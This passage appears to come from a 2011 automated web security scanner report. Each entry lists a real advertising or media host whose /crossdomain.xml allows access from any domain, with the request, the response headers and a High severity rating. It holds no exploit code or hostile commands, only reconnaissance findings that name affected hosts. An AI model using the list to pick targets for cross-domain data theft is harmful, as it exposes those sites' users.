HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:43:58 GMT Server: Apache/2.2.9 Last-Modified: Fri, 07 May 2010 14:42:29 GMT ETag: "fe47a-6a-4860211879f40" Accept-Ranges: bytes Content-Length: 106 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://a.rad.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT Accept-Ranges: bytes ETag: "0c969ab9748cc1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Sat, 17 Sep 2011 16:27:57 GMT Connection: keep-alive Content-Length: 202 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.rfihub.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.rfihub.com |
HTTP/1.1 200 OK P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/xml; charset=iso-8859-1 Content-Length: 199 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.tribalfusion.com |
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.agkn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.agkn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"219-1313398290000" Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT Content-Type: application/xml Content-Length: 219 Date: Sat, 17 Sep 2011 16:43:19 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.amgdgt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.amgdgt.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 21 May 2010 08:32:40 GMT ETag: "85814f-12e-4871688bd9a00 Cache-Control: max-age=21600 Expires: Sat, 17 Sep 2011 21:59:46 GMT Content-Type: text/xml Content-Length: 302 Date: Sat, 17 Sep 2011 16:38:25 GMT X-Varnish: 523954775 523906680 Age: 2319 Via: 1.1 varnish Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="all" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.auditude.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.auditude.com |
HTTP/1.0 200 OK Connection: close Expires: Sat, 24 Sep 2011 16:23:18 GMT Cache-Control: max-age=604800 Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Mon, 25 Jul 2011 17:10:02 GMT Content-Length: 261 Date: Sat, 17 Sep 2011 16:23:18 GMT Server: lighttpd/1.4.18 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT Date: Sat, 17 Sep 2011 16:23:42 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Sat, 17 Sep 2011 16:37:01 GMT Content-Type: text/xml;charset=UTF-8 Date: Sat, 17 Sep 2011 16:37:00 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://admin.brightcove |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: admin.brightcove.com |
HTTP/1.0 200 OK Server: Apache ETag: "4fbbc6624625a7f4c27 Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT Accept-Ranges: bytes Content-Length: 386 Content-Type: application/xml Cache-Control: max-age=1200 Date: Sat, 17 Sep 2011 16:38:34 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://admonkey.dapper |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: admonkey.dapper.net |
HTTP/1.1 200 OK Server: nginx/0.7.64 Date: Sat, 17 Sep 2011 16:44:35 GMT Content-Type: application/xml Connection: close Last-Modified: Tue, 03 Aug 2010 09:20:10 GMT ETag: "3d1f458-ca-48ce7d2dee680 Accept-Ranges: bytes Content-Length: 202 Vary: Accept-Encoding <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.amgdgt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.amgdgt.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 21 May 2010 08:32:40 GMT ETag: "85814f-12e-4871688bd9a00 Cache-Control: max-age=21600 Expires: Sat, 17 Sep 2011 22:25:23 GMT Content-Type: text/xml Content-Length: 302 Date: Sat, 17 Sep 2011 16:45:16 GMT X-Varnish: 1731774803 1731750635 Age: 1193 Via: 1.1 varnish Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="all" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.undertone.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.undertone.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 09 Sep 2011 21:28:46 GMT ETag: "30b0406-fc-4ac88dcc0df80 Content-Type: text/xml Date: Sat, 17 Sep 2011 16:44:05 GMT Content-Length: 252 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.undertone.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.yldmgrimg.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.yldmgrimg.net |
HTTP/1.0 200 OK Last-Modified: Mon, 19 Oct 2009 20:41:08 GMT ETag: "YM:1:f3afab59-44f8-4ca0 Content-Type: text/xml Server: YTS/1.17.24 x-ysws-request-id: 54b5af01-e8c8-4c8a-af70 Cache-Control: max-age=315129301 Expires: Sun, 12 Sep 2021 00:18:11 GMT Date: Sat, 17 Sep 2011 16:23:10 GMT Content-Length: 403 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adserver.teracent |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adserver.teracent.net |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"373-1310680427000" Last-Modified: Thu, 14 Jul 2011 21:53:47 GMT Content-Type: application/xml Content-Length: 373 Date: Sat, 17 Sep 2011 16:26:34 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <sit ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adsfac.us |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT Accept-Ranges: bytes ETag: "0291dc9322c91:0" Server: Microsoft-IIS/7.0 P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sat, 17 Sep 2011 16:38:20 GMT Connection: close Content-Length: 125 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="true" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://adunit.cdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adunit.cdn.auditude.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=345600 Content-Type: text/x-cross-domain Date: Sat, 17 Sep 2011 16:23:16 GMT ETag: "1376296382" Expires: Wed, 21 Sep 2011 16:23:16 GMT Last-Modified: Wed, 19 May 2010 16:53:13 GMT Server: ECS (sjo/5227) X-Cache: HIT Content-Length: 265 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://afe.specificclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: afe.specificclick.net |
HTTP/1.1 200 OK Server: WebStar 1.0 Content-Type: text/xml Content-Length: 194 Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://ajax.googleapis |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com |
HTTP/1.0 200 OK Expires: Sun, 18 Sep 2011 14:18:56 GMT Date: Sat, 17 Sep 2011 14:18:56 GMT Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 8218 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: amch.questionmarket.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:37:28 GMT Server: Apache/2.2.3 Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT ETag: "e0686c83-d1-4100ff9 Accept-Ranges: bytes Content-Length: 209 Keep-Alive: timeout=5, max=402 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://analytics.newsinc |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: analytics.newsinc.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 17 Sep 2011 16:23:17 GMT ETag: "b485279b64cb1:0" Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT NDN-Server: Ana03 NDN-SiteVer: 3.0 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 286 Connection: Close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*"/> <allow-ht ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.zap2it.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 23 May 2008 16:32:22 GMT ETag: "13d8b5-c9-5fcf1180" Accept-Ranges: bytes Content-Length: 201 Content-Type: application/xml Cache-Control: max-age=10800 Expires: Sat, 17 Sep 2011 19:23:30 GMT Date: Sat, 17 Sep 2011 16:23:30 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://as1.suitesmart.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: as1.suitesmart.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT ETag: "19e27-ca-49c6f3a952b40" Accept-Ranges: bytes Content-Length: 202 Content-Type: text/xml Date: Sat, 17 Sep 2011 16:39:32 GMT Connection: close Cache-Control: no-store <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://assets.newsinc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: assets.newsinc.com |
HTTP/1.1 200 OK x-amz-id-2: ef25XRx8OixCbWBVj1UzC x-amz-request-id: B920D3BE7919D8A2 Date: Sat, 17 Sep 2011 16:23:20 GMT Last-Modified: Mon, 26 Oct 2009 18:52:29 GMT ETag: "9a2df4412dfbe178fcc Accept-Ranges: bytes Content-Type: text/xml Content-Length: 335 Connection: keep-alive Server: AmazonS3 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.rad.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT Accept-Ranges: bytes ETag: "0c969ab9748cc1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Sat, 17 Sep 2011 16:29:19 GMT Connection: keep-alive Content-Length: 202 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT Content-Type: application/xml Expires: Sun, 18 Sep 2011 16:23:09 GMT Date: Sat, 17 Sep 2011 16:23:09 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK Server: GlassFish v3 Accept-Ranges: bytes ETag: W/"269-1314729061000" Last-Modified: Tue, 30 Aug 2011 18:31:01 GMT Content-Type: application/xml Content-Length: 269 Date: Sat, 17 Sep 2011 16:31:13 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bs.serving-sys.com |
HTTP/1.1 200 OK Cache-Control: max-age=2592000 Content-Type: text/xml Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT Accept-Ranges: bytes ETag: "0e2c3cba13c91:0" P3P: CP="NOI DEVa OUR BUS UNI" Date: Sat, 17 Sep 2011 16:23:45 GMT Connection: close Content-Length: 100 <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://c.brightcove.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.brightcove.com |
HTTP/1.1 200 OK X-BC-Client-IP: X-BC-Connecting-IP: Last-Modified: Fri, 09 Sep 2011 02:01:13 UTC Cache-Control: must-revalidate,max-age=0 Content-Type: application/xml Content-Length: 116 Date: Sat, 17 Sep 2011 16:38:02 GMT Connection: keep-alive Server: <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://c.delish.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.delish.com |
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 19:41:52 GMT Accept-Ranges: bytes ETag: "0034cafd9acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 17 Sep 2011 16:21:11 GMT Connection: keep-alive Content-Length: 109 <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://c.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.msn.com |
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT Accept-Ranges: bytes ETag: "044698a197dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 17 Sep 2011 16:29:03 GMT Connection: keep-alive Content-Length: 109 <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cache.specifi |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cache.specificmedia.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:55 GMT Server: PWS/ X-Px: ms lax-agg-n30 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn Cache-Control: max-age=604800 Expires: Wed, 21 Sep 2011 07:37:24 GMT Age: 290791 Content-Length: 194 Content-Type: text/xml Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.eyewonder.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.eyewonder.com |
HTTP/1.0 200 OK Cache-Control: max-age=3600 Content-Type: text/xml Accept-Ranges: bytes ETag: "b2ae8e693141c91:17da" Server: Microsoft-IIS/6.0 p3p: policyref="/100125/w3c X-Powered-By: ASP.NET Age: 1009 Date: Sat, 17 Sep 2011 16:38:52 GMT Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT Expires: Sat, 17 Sep 2011 17:22:03 GMT Content-Length: 195 Connection: close <?xml version="1.0"?> <!-- http://cdn.eyewonder.com- <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.turn.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Pragma: private Content-Type: text/xml;charset=UTF-8 Cache-Control: private, max-age=0 Expires: Sat, 17 Sep 2011 16:37:32 GMT Date: Sat, 17 Sep 2011 16:37:32 GMT Content-Length: 100 Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ce.lijit.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ce.lijit.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:31:12 GMT Server: PWS/ X-Px: ms sea-ag1-n11 ( sea-ag1-n1), ht sea-ag1-n1.panthercdn.com ETag: "f211e-83-4ac74a1592380" Cache-Control: max-age=604800 Expires: Tue, 20 Sep 2011 12:54:55 GMT Age: 358577 Content-Length: 131 Content-Type: application/xml Last-Modified: Thu, 08 Sep 2011 21:20:30 GMT Connection: close <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cn1.kaboodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cn1.kaboodle.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 ETag: W/"200-1315340584000" Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT Content-Type: application/xml Content-Length: 200 Date: Sat, 17 Sep 2011 16:30:35 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cn2.kaboodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cn2.kaboodle.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 ETag: W/"200-1315340584000" Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT Content-Type: application/xml Content-Length: 200 Date: Sat, 17 Sep 2011 16:30:40 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cn3.kaboodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cn3.kaboodle.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 ETag: W/"200-1315340584000" Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT Content-Type: application/xml Content-Length: 200 Date: Sat, 17 Sep 2011 16:30:46 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://content.aggre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: content.aggregatekno |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 17 Sep 2011 16:43:23 GMT ETag: "3530268-120-4820a71 Last-Modified: Thu, 18 Mar 2010 03:01:12 GMT Server: ECS (sjo/5227) X-Cache: HIT Content-Length: 288 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain-p ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d.agkn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d.agkn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"219-1313398290000" Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT Content-Type: application/xml Content-Length: 219 Date: Sat, 17 Sep 2011 16:39:39 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dc.kaboodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: dc.kaboodle.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:31:59 GMT Server: Omniture DC/2.0.0 xserver: www280 Content-Length: 137 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://dis.criteo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: dis.criteo.com |
HTTP/1.1 200 OK Server: nginx Cache-Control: max-age=31104000 Cache-Control: public Content-Type: text/xml Date: Sat, 17 Sep 2011 16:43:47 GMT Expires: Tue, 11 Sep 2012 16:43:47 GMT Accept-Ranges: bytes Connection: close Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT Content-Length: 360 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ds.serving-sys.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ds.serving-sys.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT Server: Microsoft-IIS/6.0 Date: Sat, 17 Sep 2011 16:23:48 GMT Content-Length: 100 Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://edge.aperture |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: edge.aperture.displa |
HTTP/1.0 200 OK Content-Length: 268 Content-Type: text/xml Content-Location: http://edge.aperture Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT Accept-Ranges: bytes ETag: "88db83a088fca1:1b76" Server: Microsoft-IIS/6.0 X-Server: D2A.NJ-a.dm.com_x P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI" X-Powered-By: ASP.NET Expires: Sat, 17 Sep 2011 16:38:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 17 Sep 2011 16:38:26 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <site-control perm ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://edge1.catalog |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: edge1.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1bfbe6a41d40cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Content-Length: 177 Age: 766712 Date: Sat, 17 Sep 2011 16:30:01 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Thu, 22 Sep 2011 19:31:29 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://edge3.catalog |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: edge3.catalog.video.msn |
HTTP/1.0 200 OK Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1bfbe6a41d40cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 177 Age: 70610 Date: Sat, 17 Sep 2011 16:30:22 GMT Last-Modified: Mon, 11 Jul 2011 22:55:35 GMT Expires: Fri, 30 Sep 2011 20:53:32 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /crossdomain.xml |
